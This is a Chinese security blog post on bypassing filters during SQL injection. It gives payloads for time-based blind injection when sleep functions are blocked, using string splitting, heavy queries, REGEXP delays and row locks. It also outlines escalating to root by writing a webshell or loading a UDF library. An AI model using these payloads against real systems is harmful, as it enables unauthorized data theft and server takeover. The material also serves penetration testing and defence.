WEB安全--SQL注入--bypass技巧2

继之前文章的补充:

WEB安全--SQL注入--bypass技巧_sql注入过滤空格-CSDN博客

Q1:发现sql注入的时间盲注时,如果时间盲注的函数都被过滤了,怎么办?

除了找其他函数替换、编码等方式,还有以下方式绕过:

1、尝试其他注入手段是否有效果,比如报错注入、DNSLog外带等;
2、将被过滤的函数以拼接的方式呈现(如果正则验证不严格可能绕过):
sql 复制代码
SELECT /*!50000sleep*/(5);
SELECT s||l||e||e||p(5);  -- Oracle
SELECT sle+ep(5);  --MSSQL
3、利用其他延时机制模拟相同效果:

笛卡尔积+大量数据处理(MySQL)

sql 复制代码
SELECT COUNT(*) FROM large_table1, large_table2, large_table3 WHERE ...

递归(MSSQL/PostgreSQL)

sql 复制代码
WITH RECURSIVE t(n) AS (
  SELECT 1 UNION ALL SELECT n+1 FROM t WHERE n < 1000000
)
SELECT * FROM t;
4、响应包判断:

所谓sql时间盲注指页面没有任何回显,但实际情况下响应包的内容可能会因为请求的sql语句而产生细微变化。

根据这一特性,我们可以尝试用普通的真假条件语句结合响应包中的内容去判断,可以将此sql时间盲注转化为类似布尔盲注的形式。

sql 复制代码
?id=1' AND (condition) --+
5、构造事件:

构造一个事件或触发器,让它执行慢查询或利用其副作用来判断条件是否成立(要有写权限)。

sql 复制代码
CREATE EVENT myevent ON SCHEDULE AT CURRENT_TIMESTAMP + INTERVAL 5 SECOND DO SELECT 1;
6、正则匹配:

某些复杂的正则或字符串处理函数在不同的输入下计算量不同,可造成微小但可检测的延迟。

sql 复制代码
1' AND IF(ASCII(SUBSTRING((SELECT user()),1,1)) > 100, 
    'A' REGEXP BINARY REPEAT('A',1000000), 
    1)--+
7、加锁操作延时:

如果条件不成立,快速返回;

如果条件成立→ 查询 users 中 id=1 并对其加锁,当前连接挂起等待锁释放(通常可控制几秒)

sql 复制代码
1' AND IF(ASCII(SUBSTRING((SELECT user()),1,1)) > 100, 
    (SELECT 1 FROM users WHERE id=1 FOR UPDATE), 
    1)--+

Q2、在服务器权限为普通用户是,sql注入如何获取服务器root权限?

判断注入的类型

判断数据库类型、版本等信息

判断当前用户权限(至少需要有文件写权限)

sql注入将webshell写入服务器web目录中(需要知道物理路径)==> 服务器脚本提权 ==> 在蚁剑中执行系统命令

上传.dll/.so文件(需要知道物理路径)==> 进行系统提权(UDF) ==> 在数据库命令行执行系统命令

相关推荐
白帽黑客沐瑶14 小时前
【网络安全就业】信息安全专业的就业前景(非常详细)零基础入门到精通,收藏这篇就够了
网络·安全·web安全·计算机·程序员·编程·网络安全就业
鸿乃江边鸟17 小时前
向量化和列式存储
大数据·sql·向量化
lubiii_1 天前
网络安全渗透测试第一步信息收集
安全·web安全·网络安全
懒虫虫~1 天前
通过内存去重替换SQL中distinct,优化SQL查询效率
java·sql·慢sql治理
逛逛GitHub1 天前
1 个神级智能问数工具,刚开源就 1500 Star 了。
sql·github
Huhbbjs1 天前
SQL 核心概念与实践总结
开发语言·数据库·sql
咋吃都不胖lyh1 天前
SQL-字符串函数、数值函数、日期函数
sql
sensenlin911 天前
Mybatis中SQL全大写或全小写影响执行性能吗
数据库·sql·mybatis
xqlily2 天前
SQL 数据库简介
数据库·sql